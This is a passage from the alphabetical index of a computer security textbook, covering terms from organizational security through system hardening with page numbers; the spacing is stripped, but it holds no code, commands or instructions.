alertsregardingnewthreatsandsecuritytrends,57–58awarenessandtraining,54–55changemanagementpolicy,44–45compliancewithlaws,bestpracticesandstandards,56CompTIASecurity+ExamObjectives,741–745datapolicies,45–47duecareandduediligence,53dueprocess,54electromagneticeavesdropping,66–67
environmentalissues,63–64firesuppression,64humanresourcespolicies,47–53incidentresponsepoliciesandprocedures,54interoperabilityagreements,58–59overviewof,42physicalaccesscontrols,61–63policies,procedures,standards,andguidelines,43–44policytrainingandprocedures,55preparingforincidentresponse,655–656reviewandQ&A,68–71role-basedtraining,55–56securityperimeter,60–61trainingmetricsandcompliance,58userhabitsin,56–57wirelessnetworksand,65–66
orthogonalfrequencydivisionmultiplexing(OFDM),348–349OSI(OpenSystemInterconnection)model
bridgesandswitchesoperatingatLayer2,257–258hubsoperatingatLayer1,257networkprotocolsand,224–225routersoperatingatLayer3,258
OSPF(OpenShortestPathFirst),442OSs(operatingsystems).Seealsobyindividualoperatingsystem
hardening,240hosthardening,412hostsecurityand,23passivetoolsformapping,402–403systemhardening,409–410trusted,434–435
out-of-bandcommunication,keyexchangeas,118
Outlook,S/MIMEoptionsin,519–520outsourcedCAs,153–154OVAL(OpenVulnerabilityandAssessmentLanguage),578OWASP(OpenWebApplicationSecurityProject)
sessionmanagementcheatsheet,22web-basedvulnerabilitiesand,553
PP2P(peer-to-peer)
alertsregardingnewthreatsandsecuritytrends,57Bluetoothandwirelesscommunication,65networkarchitectures,222trustmodel,158–159
PaaS(PlatformasaService),284packetfiltering,mechanismsfirewallsarebasedon,261–262packetflags,TCP,229packetsniffers.Seesniffers/sniffingpackets
fragmentation,225–226localpacketdelivery,233–234MTU(MaximumTransmissionUnit),225overviewof,225remotepacketdelivery,234–236
PaddingOracleOnDowngradedLegacyEncryption(POODLE)attacks,532
pan,tilt,zoom(PTZ)cameras,199panelantennas,360PANs(personalareanetworks),65PAP(PasswordAuthenticationProtocol),318,320Paretocharts,toolsforriskmanagement,626
paritybits,analysisofdatastreamforchanges,685partitions,systemforensicsand,686partners,on-boarding/off-boarding,49pass-the-hashattacks,492PasswordAuthenticationProtocol(PAP),318,320Password-BasedKeyDerivationFunction2(PBDDF2),119passwords
accesscontrolpolicies,33deviceconfiguration,442–443domainpasswordpolicy,293–294expiration,297guessingattacks,294,490–492hardeningWindowsServer2008,414passwordpolicy,292–293poorsecuritypractices,78–80SSO(singlesign-on),294–295
PAT(PortAddressTranslation),239patches
applicationhardening,444–445applications(programs),579BYODconcerns,367hosthardening,423–426patchmanagement,445–448virtualizationand,254
PaymentCardIndustryDataSecurityStandard(PCIDSS),703–704,725PBDDF2(Password-BasedKeyDerivationFunction2),119PBX(privatebranchexchange),266PCIDSS(PaymentCardIndustryDataSecurityStandard),703–704,725PEAP(ProtectedEAP)
currentsecuritymethods,357PEAP-TLS,312
peer-to-peer.SeeP2P(peer-to-peer)penetrationtests,analysisofsecuritymeasures,44people,roleinsecurity
cleandeskpolicies,83dathandlingand,82dumpsterdiving,80–81hoaxes,77–78installingunauthorizedhardwareorsoftware,81–82obtaininginsiderinformation,74–75overviewof,72passwordselection,78–80phishingattacks,75–76physicalaccess,82–83piggybacking(tailgating),80poorpracticesand,78reversesocialengineering,77reviewandQ&A,86–89securityawarenessand,84shouldersurfing,76–77,80socialengineeringand,73–74SPAM,76trainingprograms,85vishingattacks,76
perfectforwardsecrecy,secrecyprinciples,120perimetersecurity
NIDSsin,383organizationalsecurity,60–61
permissionscompletemediationand,27MacOSXfilepermissions,422formachinesecurity,441
NTFS,297–298reviewingasriskmitigationstrategy,615securitytemplates,453UNIXfilepermissions,302inWindowssecuritymodel,289–290
personalareanetworks(PANs),65personalidentificationnumbers(PINs)
inasymmetricencryption,297shouldersurfingattacksand,77,80
PersonalIdentityVerification(PIV)cards,211PersonalInformationProtectionandElectronicDataAct(PIPEDA),729personallyidentifiableinformation.SeePII(personallyidentifiableinformation)
personnel,successionplanning,586–587PERT(programevaluationandreviewtechnique)charts,626PET(privacyenhancingtechnology),730PGP(PrettyGoodPrivacy)
cryptographicapplications,122encryptinge-mail,520–521howitworks,180–182overviewof,180
pharmingattacksoverviewof,485–486typesofphishingattacks,76
PHI(ProtectedHealthInformation),723phishingattacks
alertsregardingnewthreatsandsecuritytrends,57socialengineeringattacks,75–76typesof,485–486
phones.Seemobiledevices;telecommunicationsPHP,server-sidescripts,547
phreakingbasicsecurityterminology,19hacksonphonesystem,266
physicallayer(Layer1),OSI,hubsoperatingat,257physical(realorassociative)evidence,676physicalsecurity
accessbynon-employees,82–83accesscontrols,61–63,196accesstokens,211–214alarms,199–200attacksrelatedtophysicalaccess,191–194autoplayand,201–202BIOSandUEFI,200–201cameras,198–199convergenceand,200dealingwithunauthorizedaccess,282–283devicetheft,203–204doors,198electronicaccesscontrolsystems,197–198environmentalcontrols,204firedetection,207–208firesuppression,205–207guardsin,196isolationofsystem,13layeredaccess,197locks,196–197multiple-factorauthentication,214–215overviewof,190–191policiesandprocedures,200powerprotection,208–210reviewandQ&A,216–219
sniffingattacksand,479USBdevicesand,201walls,fences,gates,anddoorsin,195
PIA(privacyimpactassessment),731PID(processID),hardeningUNIXOSs,418piggybacking(tailgating),poorsecuritypractices,80PII(personallyidentifiableinformation)
collecting,717notice,choice,andconsent,719overviewof,717–718searchingforyourown,718
pingofdeath,386pingofdeath(POD),475pingsweep,231PINs(personalidentificationnumbers)
inasymmetricencryption,297shouldersurfingattacksand,77,80
PIPEDA(PersonalInformationProtectionandElectronicDataAct),729PIV(PersonalIdentityVerification)cards,211PKCs(PublicKeyCertificates),168–169PKCS(PublicKeyCryptographyStandards)
overviewof,170–171PKCS#1attack,341assubsetofRSASecurity,168
PKI(publickeyinfrastructure)centralizedanddecentralizedinfrastructures,146–147certificateattributes,135–137certificateauthorities,130–131certificate-basedthreats,160–161certificateextensions,135–136certificatekeydestruction,142
certificatelifecycle,137certificateregistrationandgeneration,137–138certificaterenewal,138–139certificaterepositories,143certificaterevocation,139–142certificatesuspension,139combiningtypesofPKIs,154–155CSR(certificatesigningrequest),138digitalcertificates,134–135hierarchicaltrustmodel,155–157HSMs(hardwaresecuritymodules),147–148hybridtrustmodel,159–160inhouseCAs,152–153keyescrow,150–151keyrecovery,149–150LRAs(localregistrationauthorities),132–133OCSP(onlinecertificatestatusprotocol),142outsourcedCAs,153–154overviewof,128–130peer-to-peertrustmodel,158–159privatekeyprotection,148–149publicCAs,151–152RAs(registrationauthorities)and,131–132reviewandQ&A,162–165trustandcertificateverification,143–146trustmodelsand,155–157
PKI(publickeyinfrastructure),protocolsCC(CommonCriteriaforInformationTechnologySecurity),184ciphersuites,174CMP(CertificateManagementProtocol),176FIPS(FederalInformationProcessingStandardsPublications),183
HTTPS(HTTPSecure),182IPsec(IPSecurity),182–183ISAKMP(InternetSecurityAssociationandKeyManagement),174–175
ISO/IEC27002,184–185overviewof,166–168PGP(PrettyGoodPrivacy),180–182PKCS(PublicKeyCryptographyStandards),170–171PKIX(PKIX.509),169–170reviewandQ&A,186–189S/MIME(Secure/MultipurposeInternetMailExtensions),178–180SSL/TLS(SecureSocketsLayer/TransportLayerSecurity),173–174WTLS(WirelessTransportLayerSecurity),184X.509,172XKMS(XMLKeyManagementSpecification),176–178
PKIX(PKIX.509)CMP(CertificateManagementProtocol),176digitalcertificates,134majorareasaddressedby,169–170modelillustrated,168
plaintextattacksonencryption,486encryptingintociphertext,90historicalperspectivesoncryptography,94
plansbusinesscontinuity,585contingencyplanning,589disasterrecovery,587–588
PlatformasaService(PaaS),284PMI(privilegemanagementinfrastructure),170POD(pingofdeath),475
Point-to-PointProtocol(PPP),317–318Point-to-PointTunnelingProtocol(PPTP),318–319policies
accesscontrolpolicy,32–33BYODconcerns,368–369changemanagementpolicy,44–45cleandeskpolicies,83datapolicy,45–47defined,43developing,43–44domainpasswordpolicy,293–294enforcing,410firewallpolicy,260–261groups.SeeGroupPolicyhumanresourcespolicy,47–53incidentresponsepolicy,54,655ISO/IEC27002inimplementationof,184–185passwordpolicy,292–293physicalsecurity,200privacypolicy,52–53,730softwarerestrictive,434trainingand,55
policycertificates,137policylifecycle,43polymorphicmalware,466,469POODLE(PaddingOracleOnDowngradedLegacyEncryption)attacks,532
poorsecuritypracticescleandeskpolicies,83datahandlingand,82dumpsterdiving,80–81
installingunauthorizedhardwareorsoftware,81–82overviewof,78passwordselection,78–80physicalaccess,82–83piggybacking(tailgating),80shouldersurfing,80
pop-upblockers,432–433POP3(PostOfficeProtocolversion3),505PortAddressTranslation(PAT),239portmirroring,byprotocolanalyzers,399–400portmonitoring,400portscanners
nmap,402overviewof,400–402viewingopenservices,444
portscans,usingNIDS,386ports,forremoteaccessandauthenticationprotocols,330PostOfficeProtocolversion3(POP3),505power
GroupPolicyprovidingpowermanagement,451protection,208–210recoveringfrompowerinterruptions,597–598Wi-Fipowerlevels,361
PPP(Point-to-PointProtocol),317–318PPTP(Point-to-PointTunnelingProtocol),318–319PrettyGoodPrivacy.SeePGP(PrettyGoodPrivacy)prevention
ofdataloss.SeeDLP(datalossprevention)ofICMPattacks,476ofintruderswithlayeredsecurity,29–30ofintrusions.SeeIPSs(intrusionpreventionsystems)
inoperationalmodelofcomputersecurity,20stepsadministratorscantake,13ofSYNfloodattacks,477oftailgating,198
primenumbersuseinDHprotocol,110useinRSAprotocol,111
printing,location-based,452privacy
BYODconcerns,368compliancesteps,730cybercrimeand,701databreaches,733encryptionand,729notice,choice,andconsent,719overviewof,716–717PET(privacyenhancingtechnology),730PIA(privacyimpactassessment),731PII(personallyidentifiableinformation),717–718policies,52–53,730reviewandQ&A,734–736sensitivePII,718useractionsand,732–733webissues,731–732
PrivacyActof1974,719–720privacyenhancingtechnology(PET),730privacyimpactassessment(PIA),731privacy,internationallaws
Asianlaws,729–730Canadianlaws,729Europeanlaws,728–729
OECD(OrganizationforEconomicCo-operationandDevelopment),727
overviewof,727privacy,U.S.laws
CaliforniaSenateBill1386(SB1386),724CFAA(ComputerFraudandAbuseAct),721–722COPPA(Children’sOnlinePrivacyProtectionAct),722FACTA(FairandAccurateCreditTransactionsAct),725FCRA(FairCreditReportingAct),725FERPA(FamilyEducationRecordsandPrivacyAct),721FOIA(FreedomofInformationAct),720–721GLBA(Gramm-Leach-BlileyAct),724HIPAA(HealthInsurancePortabilityandAccountabilityAct),723–724
overviewof,719–720PCIDSS(PaymentCardIndustryDataSecurityStandard),725PrivacyActof1974,720U.S.bankingrulesandregulations,724–725VPPA(VideoPrivacyProtectionAct),722–723
privateaddressspace,RFC1918,237privatebranchexchange(PBX),266privateclouds,283privatekeys
howPGPworks,180protecting,148–149publickeyscomparedwith,130
privilegemanagementinfrastructure(PMI),170privileges
defined,288escalation,652jailbreaking,456
leastprivilege,24–25managing,288–289separationofprivilege,25–26usinglow-privilegemachinetoaccesssensitiveinformation,191WindowsOSs,298–300
procedures,55defined,43developing,43–44incidentresponse,54physicalsecurity,200
processID(PID),hardeningUNIXOSs,418processmodels,forsoftwaredevelopment,559–560productionsystems,patching,446productivity,websecuritygatewaysmonitoring,271programevaluationandreviewtechnique(PERT)charts,626programs.Seeapplicationspromiscuousmode,NICsand,383–384,398promotions,humanresourcespolicies,48proofofpossession,publickeys,138ProtectedEAP(PEAP)
currentsecuritymethods,357PEAP-TLS,312
ProtectedHealthInformation(PHI),723protection,inoperationalmodelofcomputersecurity,20protectionrings,OSsecurityand,410protocolanalyzers.Seealsosniffers/sniffing,398–399protocols,network,223–225proxies
applicationlayer,262–263proxyattacks,270–271proxyservers,270
SSL/TLS,535prudentpersonprinciple,53pscommand,viewingrunningservicesonUNIXOSs,418PSTN(publicswitchedtelephonenetwork),60psychologicalacceptability,SaltzerandSchroeder’seightprinciplesofsecuritydesign,29
PTZ(pan,tilt,zoom)cameras,199publicCAs
choosingbetweenpublicandin-houseCAs,152–153outsourcedCAscomparedwith,153overviewof,151–152
publicclouds,284PublicKeyCertificates(PKCs),168,169publickeycryptography.SeeasymmetricencryptionPublicKeyCryptographyStandards.SeePKCS(PublicKeyCryptographyStandards)
publickeyinfrastructure.SeePKI(publickeyinfrastructure)publickeys
certificaterepositories,143CSR(certificatesigningrequest),138howPGPworks,180man-in-the-middleattacks,129privatekeyscomparedwith,130proofofpossession,138
publicswitchedtelephonenetwork(PSTN),60publicWi-Fi,securing,362
QQA(qualityassurance),changemanagementand,635Qakbotworm,isolating,662QCs(QualifiedCertificates),170
qualitativeriskassessmentaddingobjectivityto,621–622comparingwithquantitativeassessment,625defined,611overviewof,620–621
qualityassurance(QA),changemanagementand,635quantitativeriskassessment
defined,611overviewof,621
quantumcryptanalysis,114quantumcryptography,113–114quantummechanics,113–114quarantine,isolatingincidents,661
RRACEIntegrityPrimitivesEvaluationMessageDigest(RIPEMD),101radiofrequency.SeeRF(radiofrequency)RADIUS(RemoteAuthenticationDial-InUserService)
accounting,314authentication,312–314authorization,314overviewof,312remoteaccessvulnerabilities,329–330
RAID(RedundantArrayofIndependentDisks),601–602rainbowtables,102randomnumbers
cryptographyand,566usewithencryptionalgorithms,98
ransomware,473RapidSpanningTreeProtocol(RSTP),243
RAs(registrationauthorities)local,132–133overviewof,131–132PKIXstandardand,168servicesprovidedby,129
RAS(remoteaccessserver),305RATs(remoteaccesstrojans),496,653RBAC(role-basedaccesscontrol),303RBL(Real-timeBlackholeList),515RC(RivestCipher)
IEEE802.11attacksonRC4,353RC4usedforconfidentialityinWEP,350RC4usedforSSL/TLSencryption,533RC5supportedbyWTLS,340versionsof,106–107
RDP(RemoteDesktopProtocol),322real(associativeorphysical)evidence,676Real-timeBlackholeList(RBL),515realtime,HIDSsoperatingin,388reciprocalsites,alternativebackupsites,597records,securitytrainingand,58recoveryagent,150recoverypointobjectives(RPOs)
disasterrecovery,591failureandrecoverytiming,601
recovery/reconstitutionprocedures,incidentresponse,665–666recoverytimeobjectives(RTO),disasterrecovery,591redflagrules,FTC,726redundancy
RAID(RedundantArrayofIndependentDisks),601–602ofspareparts,602–603
referencemonitor,enforcingsecuritypolicies,410registrationauthorities.SeeRAs(registrationauthorities)registry
forensicartifactsin,687–688securitytemplatesand,453
regulations,primarysourcesof.Seealsolegalissues,698–699rehearsals,disasterrecovery,589–590releasecontrol,635releasemanagement,641relevantevidence,standardsofevidence,677remediationactions,afterattacks,684remoteaccess
accesscontrol,311authentication,306–310authorization,310–311connections,330filetransferprotocols,322–323identificationin,305–306IEEE802.1X,311–312IPsec(IPSecurity),324–329keyissueformultiusersystems,289methods,312–314processof,305reviewandQ&A,331–335TACAS+(TerminalAccessControllerAccessControlSystem+),314–317
vulnerabilities,329–330remoteaccessserver(RAS),305remoteaccesstrojans(RATs),496,653RemoteAuthenticationDial-InUserService.SeeRADIUS(RemoteAuthenticationDial-InUserService)
RemoteDesktopProtocol(RDP),322remoteprocedurecall(RPC),568remotewiping,mobiledevicesecurity,363removablemedia
electronicmedia,280–281encrypting,439magneticmedia,278–279opticalmedia,279–280overviewof,277–278
removablestoragemobiledevicesecurityand,366overviewof,256
renewal,digitalcertificates,138–139replayattacks,484reports
inIDSs,379incidentresponse,666
requirementsphase,softwaredevelopment,561–562residualriskmanagement,618response,inoperationalmodelofcomputersecurity,20retention,auditing,499retrievalmethod,XKMS,177reverseproxy,271reversesocialengineering,77revocation,digitalcertificates,139–142RF(radiofrequency)
antennaplacementand,360sitesurveystestingforRFinterference,361unguidedmedia,277
RFC1918,privateaddressspace,237Rifkin,StanleyMark,74–75
rightsauditinguserrights,498reviewingasriskmitigationstrategy,615securitytemplatescontrollingsettings,453WindowsOSs,289,298–300
Rijndael,AESbasedon,105Ringpolicy,Bibasecuritymodel,36ringtopology,networktopologies,222RIP(RoutingInformationProtocol),442RIPEMD(RACEIntegrityPrimitivesEvaluationMessageDigest),101risks/riskmanagement
acceptance,625assessment,586avoidance,transference,acceptance,mitigation,anddeterrence,628–629
bestpractices,627–629businessrisks,613calculations,622–625cost-effectivenessmodeling,626–627cultureof,612generalriskmanagementmodel,616–618internationalbankingexample,609–610mitigationstrategies,614–615models,619NISTmodels,618–619overviewof,608–609qualitativeandquantitativeassessment,620–622,625reviewandQ&A,630–633SEI(SoftwareEngineeringInstitute)model,618technologyrisks,613–614tools,625–626
vocabulary,610–611whatitis,611–612
RivestCipher.SeeRC(RivestCipher)Rivest,Ron,106–107,110–111Rivest,Shamir,andAdleman(RSA)algorithm.SeeRSA(Rivest,Shamir,andAdleman)algorithm
rlogincommand,Telnet,321roadappleattacks,193rogueaccesspoints
unauthorizedaccessvia,82useforattacksonIEEE802.11,352–353
roguedevice,detectionof,234roguemodems,war-dialingand,477roles
hardeningWindowsServer2008,414managingaccessby,292role-basedaccesscontrol(RBAC),303role-basedtraining,55–56
rootaccount,specialuseraccounts,290rootCA,172rootkits,470–471rounds,DES,104routers/routing,235
infrastructuresecurity,258–259softwareupdates,442
RoutingInformationProtocol(RIP),442RPC(remoteprocedurecall),568RPOs(recoverypointobjectives)
disasterrecovery,591failureandrecoverytiming,601
RSA(Rivest,Shamir,andAdleman)algorithm
overviewof,110–111PGPusing,181PKCS#1attackand,341SSHand,322SSL/TLSusing,533
RSASecurityPKCSassubsetof,168PKCS(PublicKeyCryptographyStandards),170–171S/MIMEstandard,178,518
RSTP(RapidSpanningTreeProtocol),243RTO(recoverytimeobjectives),disasterrecovery,591rule-based
accesscontrol,303antivirusproducts,428
runlevels,hardeningUNIXOSs,418Russia
nation-statehacking,7powergridattacksand,4
SS/MIME(Secure/MultipurposeInternetMailExtensions)
CMStriple-encapsulatedmessages,180encryptinge-mail,518–520historyof,178–179overviewof,178specificationsinversion3,179
SaaS(SoftwareasaService)cloudcomputingand,284DRM(digitalrightsmanagement)and,122
SafeHarbor,dataprotection,728–729
SAFECode(SoftwareAssuranceForumforExcellenceinCode),560safeguards(controlsorcountermeasures)
defined,610designingandevaluating,617
Saltzer,Jerome,24SAML(SecurityAssertionMarkupLanguage),185sandboxing
digitalsandbox,396exampleofleastcommonmechanism,28virtualizationand,255
SANs(storageareanetworks)networkarchitectures,221overviewof,247storingdata,441
Sarbanes-OxleyAct(SOX),637,703SAs(securityassociations)
IPsec,325ISAKMP,175
SaudiAramco,6SB1386(CaliforniaSenateBill1386),724SCA(StoredCommunicationsAct),700SCADA(supervisorycontrolanddataacquisition),454scanningattacks,486,652Schneider,Bruce,107Schroeder,Michael,24SCM(SecurityComplianceManager),416screenlocks,mobiledevicesecurity,363–364scriptkiddies,9scriptinglanguages,JavaScript,544–545scripts,server-side,547SDcards,280
SDL(securedevelopmentlifecycle)modelsecurecodingconcepts,568softwaredevelopmentprocessmodels,559–560
secrecyprinciples,120secretinformation,classificationof,46Section404controls,Sarbanes-OxleyAct,703SecureBoot,hardeningWindowsServer2012,414–415securedevelopmentlifecycle(SDL)model
securecodingconcepts,568softwaredevelopmentprocessmodels,559–560
SecureFileTransferProtocol(SFTP),322–323,540–541SecureKeyExchangeMechanismforInternet(SKEMI),327Secure/MultipurposeInternetMailExtensions.SeeS/MIME(Secure/MultipurposeInternetMailExtensions)
securerecovery.Seealsodisasterrecovery,598–599SecureShell.SeeSSH(SecureShell)SecureSocketsLayer.SeeSSL(SecureSocketsLayer)securityapproaches
hostsecurity,23networksecurity,24overviewof,23
SecurityAssertionMarkupLanguage(SAML),185securityassociations(SAs)
IPsec,325ISAKMP,175
securityawarenessprogramsforemployees,84trainingfor,54–55
SecurityComplianceManager(SCM),416securityconcepts
accesscontrol,31–32
authentication,32Bell-LaPadulamodel,34–35Bibamodel,36Brewer-Nashmodel,35CIA(confidentiality,integrity,andavailability),20Clark-Wilsonmodel,36–37completemediation,27computersecurity,19confidentialitymodels,34configurationmanagement,23CybersecurityFrameworkModel,21–22defenseindepth,29–31diversityofdefense,31economyofmechanism,26–27exceptionmanagement,22–23fail-safedefaults,26GroupPolicy,32–33hostsecurity,23integritymodels,35leastcommonmechanism,28leastprivilege,24–25networksecurity,24opendesign,27–28operationalmodelofcomputersecurity,20overviewof,19passwordpolicy,33psychologicalacceptability,29reviewandQ&A,38–41securityapproaches,23ofsecuritymodels,33–34securityprinciples,24
securitytenets,22securityterminology,19separationofprivilege,25–26sessionmanagement,22
securitycontrolsABAC(attribute-basedaccesscontrol),303–304accountexpirationand,304ACLs(accesscontrollists),300–301inalternativeenvironments,459DAC(discretionaryaccesscontrol),302DLP(datalossprevention),304host-based,437–440MAC(mandatoryaccesscontrol),301permissions,297–298RBAC(role-basedaccesscontrol),303reviewandQ&A,331–335rule-basedaccesscontrol,303userrightsandprivileges,298–300
securitykernel,enforcingsecuritypolicies,410securitylayers,inhardening,458securitymodels
Bell-LaPadulamodel,34–35Bibamodel,36Brewer-Nashmodel,35Clark-Wilsonmodel,36–37confidentialitymodels,34integritymodels,35overviewof,33–34
securityperimeter.Seeperimetersecuritysecuritypolicies.Seepoliciessecurityprinciples(SaltzerandSchroeder)
completemediation,27defenseindepth,29–31diversityofdefense,31economyofmechanism,26–27fail-safedefaults,26leastcommonmechanism,28leastprivilege,24–25opendesign,27–28overviewof,24psychologicalacceptability,29separationofprivilege,25–26
securitytemplates,systemhardening,452–453securitytenets
configurationmanagement,23exceptionmanagement,22–23sessionmanagement,22
securityterminologyCIA(confidentiality,integrity,andavailability),20computersecurity,19CybersecurityFrameworkModel,21–22operationalmodelofcomputersecurity,20overviewof,19
securitythroughobscurity,28securityzones
conduitsand,246DMZ(demilitarizedzone),240–241enclaves,243–244extranet,242–243flatnetworks,243Internet,241–242intranet,242–243
overviewof,240VLANs(virtualLANs),244–245
SEI(SoftwareEngineeringInstitute)CMMImodels,644–645continuousriskmanagement,611–612riskmanagementmodel,618
self-certifying,rootCA,172self-signedcertificates,hierarchicaltrustmodeland,157SenderIDFramework(SIDF),blockingspamine-mail,516–517sensors,inNIDSs,384separationofduties
changemanagementand,637–638inClark-Wilsonsecuritymodel,37dualcontrol,150identifying,642overviewof,25–26
separationofprivilege,SaltzerandSchroeder’seightprinciplesofsecuritydesign,25–26
sequencenumbers,spoofingattacksand,481–482serverfarms,faulttolerancefrom,601servers
antivirussoftwarefor,429client/serverarchitectures,222hardening,411HTTPandHTTPSfordatatransfer,537–539infrastructuresecurity,253server-sidescripts,547server-sidevs.client-sidevalidation,579–580
servicelevelagreements(SLAs)cloudcomputingand,599interoperabilityagreements,59
servicepacks,hosthardening,423–426servicesetidentifiers(SSIDs)
featuresinIEEE802.11,349identifyingrogueaccesspoints,353
servicessecuritytemplatescontrollingsettings,453turningoffunneeded,411,417,443
sessionhijackingattacks.SeealsoTCP/IPhijacking,553sessionkeys,insymmetricencryption,118sessionmanagement,22SET(Social-EngineeringToolkit),496SFTP(SecureFileTransferProtocol),322–323,540–541SHA(SecureHashAlgorithm)
ensuringdataisnotmodified,685usedforSSL/TLSencryption,533versionsof,100–101WTLSsupport,340
shadowfiles,hardeningUNIXOSs,418–419Shamir,Adi,110–111Shamoon,6Shannon,Claude,120sharedsecret,symmetricencryptionand,103shieldedtwistedpair(STP)cable,274–275shiftciphers,94shouldersurfing
poorsecuritypractices,80socialengineeringattacks,76–77
side-jackingattacks,553SIDF(SenderIDFramework),blockingspamine-mail,516–517SignalingSystem7(SS7),224signature-basedscanning,antivirusproducts,427
signaturedatabaseinHIDSs,389inIDSs,379inNIDSs,384
signaturesdigital.SeedigitalsignaturesIDSs,381–382inIPSs,394
signedapplets,551–552SimpleMailTransferProtocol(SMTP),417SimpleNetworkManagementProtocol.SeeSNMP(SimpleNetworkManagementProtocol)
SimpleSecurityRule,inBell-LaPadulasecuritymodel,34simplicity,economyofmechanism,26–27singlelossexpectancy(SLE),incalculatingrisks,611,622–624singlepointoffailure
highavailabilityand,600removing,586
singlesign-on(SSO),294–295sitesurveys,Wi-Fi,361–362SKEMI(SecureKeyExchangeMechanismforInternet),327slackspace,systemforensicsand,686Slammerworm,3,575SLAs(servicelevelagreements)
cloudcomputingand,599interoperabilityagreements,59
SLE(singlelossexpectancy),incalculatingrisks,611,622–624smartcards,280smartphones,339SMTP(SimpleMailTransferProtocol)
controllingport25onmailservers,514
e-mailprotocols,505UNIXbaselinesand,417
smurfattacks,480–481SNA(SystemsNetworkArchitecture),224snapshots,virtualmachines,254sniffers/sniffing
checkingownconnections,539observingnetworktrafficforunauthorizedaccess,282overviewof,479useforattacksonIEEE802.11,352
SNMP(SimpleNetworkManagementProtocol)changingcommunitystrings,443interoperabilityand,269managingrouters,259managingswitches,258softwareupdatesand,442
Snort,NIDStools,387–388socialengineering
hoaxes,77–78obtaininginsiderinformation,74–75overviewof,73–74phishingattacks,57,75–76reversesocialengineering,77shouldersurfing,76–77spam,76typesofattacks,478vishingattacks,76
Social-EngineeringToolkit(SET),496socialmedia/socialnetworking
alertsregardingnewthreatsandsecuritytrends,57humanresourcespolicies,49
wormsand,469software.Seealsoapplications
baselinesofhostsoftware,437,448–449changecontrolworkflow,641changemanagementand,636exploits,492–493host-basedfirewalls,435–436installingunauthorized,81–82patches,4,13,426updates,425,442,473versionsandchangemanagement,636whitelistingandblacklisting,434
SoftwareasaService(SaaS)cloudcomputingand,284DRM(digitalrightsmanagement)and,122
SoftwareAssuranceForumforExcellenceinCode(SAFECode),560softwaredevelopment,558
applicationattacks,572applicationconfigurationbaseline,579applicationhardening,578–579applicationpatchmanagement,579arbitrary/remotecodeexecution,578attachmentsasattackvector,577buffer-overflowattacks,575–576bugtracking,571–572client-sideattacks,577codingphase,562–566designphase,562error/exceptionhandling,568fuzzing,571injections,573–575
input/outputvalidation,568–571integeroverflowattacks,576LSOs(locallysharedobjects),577NoSQLdatabasevs.SQLdatabase,579OVAL(OpenVulnerabilityandAssessmentLanguage),578processmodelsfor,559–560requirementsphase,561–562reviewandQ&A,581–583securecodingconcepts,568securingdevelopmentlifecycle,560server-sidevs.client-sidevalidation,579–580softwareengineeringprocess,559testingphase,567–568threatmodelingandattacksurfaceareaminimization,560–561XSRF(cross-siterequestforgery),576–577XSS(cross-sitescripting)attacks,572–573zero-dayvulnerabilities,577
SoftwareEngineeringInstitute.SeeSEI(SoftwareEngineeringInstitute)softwareengineeringprocess,559SoftwareRestrictivePolicies(SRP),434solidstatedrives(SSDs)
forensicsand,688overviewof,281
Sonyhack,6–7SOX(Sarbanes-OxleyAct),637,703spam
antispamproducts,430–431e-mailand,514–516overviewof,484SIDF(SenderIDFramework)blocking,516–517socialengineeringattacks,76
SpamURIReal-timeBlockLists(SURBL),inblockingspam,516SPAN(SwitchedPortAnalyzer)
IDSssupporting,399overviewof,400
SpanningTreeProtocol(STP),243,258spareparts,redundancyof,602–603spearphishingattacks,75,485SPF(SenderPolicyFramework)record,inblockingspam,517spimattacks,76,485spiralmodel,softwaredevelopment,559spoliation,alteringdigitalevidence,676,680spoofingattacks
DKIM(DomainKeysIdentifiedMail)detectinge-mailspoofing,517e-mailspoofing,480IPaddressspoofing,480–481overviewof,480sequencenumbersand,481–482trustedrelationshipsand,481
SPR(systemproblemreport),643spyware
antispywareproducts,431–432overviewof,471
SQLdatabase,579SQLinjectionattacks,573–574SQLSlammer,572SRP(SoftwareRestrictivePolicies),434SS7(SignalingSystem7),224SSDs(solidstatedrives)
forensicsand,688overviewof,281
SSH(SecureShell)
DHprotocolusedby,110securingnetworkfunctions,321–322STFPusing,540
SSIDs(servicesetidentifiers)featuresinIEEE802.11,349identifyingrogueaccesspoints,353
SSL(SecureSocketsLayer)DHprotocolusedby,110disabling,174howSSL/TLSworks,532–536HTTPSusing,182interactingwithPKIandcertificates,173overviewof,531–532POODLE(PaddingOracleOnDowngradedLegacyEncryption)attacks,532
SSLstrippingattacks,538SSL/TLSfunctionsforLDAPservices,539–540
SSO(singlesign-on),294–295standards.Seealsobyindividualtypes
compliancewithsecurity-related,56defined,43developing,43–44
starproperty(*-property),enforcedbyBell-LaPadula,34–35startopology,networktopologies,222STARTTLSmethod,e-mailprotocolsand,505stateofcompromise,incidentresponse,667statefulpacketfiltering,261–262staticNAT,239statutorylaws,698steganography,114–115STIX(StructuredThreatInformationeXpression),669–670
storageauditing,498backups,596managingdatastorageacrossnetwork,255–256removable,256
storageareanetworks(SANs)networkarchitectures,221overviewof,247storingdata,441
storagesegmentationBYODconcerns,367mobiledevicesecurityand,364–365
StoredCommunicationsAct(SCA),700STP(shieldedtwistedpair)cable,274–275STP(SpanningTreeProtocol),243,258streamciphers
RC4streamcipher,107,350,353vs.blockciphers,104,108
streams,forensictoolsanalyzingonWindowssystems,687stringhandling,buffer-overflowand,569StructuredThreatInformationeXpression(STIX),669–670structuredthreats,criminalorganizationsin,10Stuxnetattack,5–6,454subnetmasks,236subnetting,236–238substitutionciphers,92,94–96successionplanning,businesscontinuityand,586–587sufficientevidence,standardsofevidence,677superuser,specialuseraccounts,290supervisorycontrolanddataacquisition(SCADA),454SURBL(SpamURIReal-timeBlockLists),inblockingspam,516
Suricata,NIDStools,387–388surveillance
CCTV(closedcircuitTV)for,198–199physicalaccesscontrols,62
suspension,digitalcertificates,139SwitchedPortAnalyzer(SPAN)
IDSssupporting,399overviewof,400
switchesloopprotection,258overviewof,257–258
symmetricencryptionAES(AdvancedEncryptionStandard),105asymmetricencryptioncomparedwith,113blockciphersvs.streamciphers,108Blowfish,107CAST(CarlisleAdamsandStaffordTavares),105–106DES(DataEncryptionStandard),103–105howPGPworks,180IDEA(InternationalDataEncryptionAlgorithm),107–108overviewof,103inPGPsuite,122–123RC(RivestCipher),106–107sessionkeysin,119inSSL/TLS,533summary,108tokensand,296Twofish,107
SYNfloodattacks,475,477SYNpackets,inTCPthree-wayhandshake,228–229systemhardening
